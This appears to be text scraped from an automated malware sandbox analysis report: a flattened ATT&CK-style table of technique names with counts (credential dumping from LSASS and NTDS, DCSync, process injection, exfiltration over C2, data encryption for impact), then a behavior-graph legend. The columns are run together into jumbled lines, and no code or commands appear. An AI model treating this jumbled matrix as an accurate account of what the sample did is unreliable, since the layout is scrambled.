            Security Software Discovery            		Remote Services1
            Email Collection            		1
            Web Service            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/Job1
            DLL Side-Loading            		1
            Registry Run Keys / Startup Folder            		1
            Disable or Modify Tools            		LSASS Memory31
            Virtualization/Sandbox Evasion            		Remote Desktop Protocol1
            Archive Collected Data            		21
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		31
            Virtualization/Sandbox Evasion            		Security Account Manager1
            System Network Configuration Discovery            		SMB/Windows Admin Shares1
            Data from Local System            		3
            Ingress Tool Transfer            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
            Process Injection            		NTDS4
            File and Directory Discovery            		Distributed Component Object Model1
            Clipboard Data            		4
            Non-Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information            		LSA Secrets115
            System Information Discovery            		SSHKeylogging15
            Application Layer Protocol            		Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
            Obfuscated Files or Information            		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            DLL Side-Loading            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.